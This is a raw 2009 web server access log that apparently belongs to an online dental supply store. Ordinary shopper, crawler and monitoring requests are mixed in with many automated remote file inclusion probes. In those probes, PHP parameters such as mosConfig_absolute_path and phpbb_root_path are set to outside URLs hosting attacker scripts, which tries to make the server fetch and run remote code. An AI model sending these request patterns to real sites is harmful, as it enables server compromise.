217.67.239.230 - - [05/Aug/2009:07:29:55 -0400] "GET /logs/error_log.Q109061000/viewbody.html?code=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:07:29:55 -0400] "GET /viewbody.html?code=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:07:29:55 -0400] "GET /logs/viewbody.html?code=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:07:30:14 -0400] "GET /logs/access_log.Q109052100/viewbody.html?code=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.813"
66.244.128.29 - - [05/Aug/2009:07:30:23 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id?? HTTP/1.1" 200 12406 "-" "Advanced Browser (http://www.avantbrowser.com)"
66.244.128.29 - - [05/Aug/2009:07:30:23 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id?? HTTP/1.1" 200 409 "-" "Advanced Browser (http://www.avantbrowser.com)"
172.16.1.180 - - [05/Aug/2009:07:30:57 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:30:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:30:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
79.23.191.23 - - [05/Aug/2009:07:31:00 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:07:31:01 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:07:31:55 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:07:31:55 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
219.85.63.226 - - [05/Aug/2009:07:31:55 -0400] "GET /logs/access_log.Q109070100///poll/png.php?include_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
79.23.191.23 - - [05/Aug/2009:07:31:55 -0400] "GET /logs/access_log.Q109060700%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
210.218.5.234 - - [05/Aug/2009:07:32:30 -0400] "GET ///bbs//skin/ggambo7002_board/write.php?dir=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.218.5.234 - - [05/Aug/2009:07:32:30 -0400] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
210.218.5.234 - - [05/Aug/2009:07:32:32 -0400] "GET /logs/access_log.Q109071500///bbs//skin/ggambo7002_board/write.php?dir=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.218.5.234 - - [05/Aug/2009:07:32:57 -0400] "GET /logs/access_log.Q109072500///bbs//skin/ggambo7002_board/write.php?dir=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.46.177.182 - - [05/Aug/2009:07:32:58 -0400] "GET /logs/access_log.Q109062900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:32:58 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:00 -0400] "GET /logs/access_log.Q109061900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:02 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:03 -0400] "GET /logs/access_log.Q109061900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:03 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:03 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:04 -0400] "GET /logs/access_log.Q109062900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:22 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:22 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:22 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:26 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:28 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:29 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:29 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
66.46.177.182 - - [05/Aug/2009:07:33:34 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/perkosa.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
79.23.191.23 - - [05/Aug/2009:07:33:45 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
67.15.48.60 - - [05/Aug/2009:07:33:45 -0400] "GET /logs/access_log.Q109051700//?DOCUMENT_ROOT=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:07:33:45 -0400] "GET /logs//?DOCUMENT_ROOT=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:07:33:45 -0400] "GET //?DOCUMENT_ROOT=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:07:33:45 -0400] "GET /logs/access_log.Q109051400//?DOCUMENT_ROOT=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.810"
209.59.12.99 - - [05/Aug/2009:07:33:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.88.84 - - [05/Aug/2009:07:34:06 -0400] "GET /logs/access_log.Q109051600//include/print_category.php?setup[use_category]=1&dir=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:07:34:07 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:07:34:07 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
172.16.1.180 - - [05/Aug/2009:07:34:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:34:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:34:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.91.193.7 - - [05/Aug/2009:07:34:44 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental HTTP/1.1" 200 64648 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:47 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:47 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:47 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:48 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:48 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:49 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:50 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:51 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:52 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:52 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:53 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:54 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:34:54 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:00 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:00 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:01 -0400] "GET /images/items/CONFORM_THUMB.JPG HTTP/1.1" 200 1623 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:02 -0400] "GET /images/items/0800052_THUMB.JPG HTTP/1.1" 200 2161 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:02 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:03 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:04 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:04 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:05 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:05 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:05 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:05 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:06 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:07 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:08 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
203.91.193.7 - - [05/Aug/2009:07:35:08 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
190.248.10.179 - - [05/Aug/2009:07:35:18 -0400] "GET //shop/main.php?_shop_path=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
190.248.10.179 - - [05/Aug/2009:07:35:18 -0400] "GET /logs//shop/main.php?_shop_path=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
190.248.10.179 - - [05/Aug/2009:07:35:18 -0400] "GET /logs/access_log.Q109070700//shop/main.php?_shop_path=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:07:35:22 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:35:22 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:35:22 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.93.147.154 - - [05/Aug/2009:07:36:20 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/rebon121/new.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.93.147.154 - - [05/Aug/2009:07:36:20 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/rebon121/new.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
200.93.147.154 - - [05/Aug/2009:07:36:20 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/rebon121/new.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
172.16.1.180 - - [05/Aug/2009:07:37:41 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:37:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:37:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.249.71.201 - - [05/Aug/2009:07:37:50 -0400] "GET /images/items/9600228_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
89.108.88.84 - - [05/Aug/2009:07:38:06 -0400] "GET /logs/access_log.Q109053000//include/print_category.php?setup[use_category]=1&dir=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
203.91.193.7 - - [05/Aug/2009:07:38:12 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):dental" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MS-RTC LM 8)"
210.218.5.234 - - [05/Aug/2009:07:38:23 -0400] "GET /logs/access_log.Q109071500///bbs//skin/ggambo7002_board/write.php?dir=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.218.5.234 - - [05/Aug/2009:07:38:23 -0400] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
210.218.5.234 - - [05/Aug/2009:07:38:27 -0400] "GET ///bbs//skin/ggambo7002_board/write.php?dir=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:07:38:47 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:38:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:07:38:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
79.23.191.23 - - [05/Aug/2009:07:38:49 -0400] "GET //index.php?DOCUMENT_ROOT=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:07:38:49 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:07:38:49 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:07:38:54 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:07:38:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.218.5.234 - - [05/Aug/2009:07:39:07 -0400] "GET /logs/access_log.Q109072500///bbs//skin/ggambo7002_board/write.php?dir=http://www.skyhd.or.kr/Lboard/fx29id.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
172.16.1.168 - - [05/Aug/2009:07:40:52 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
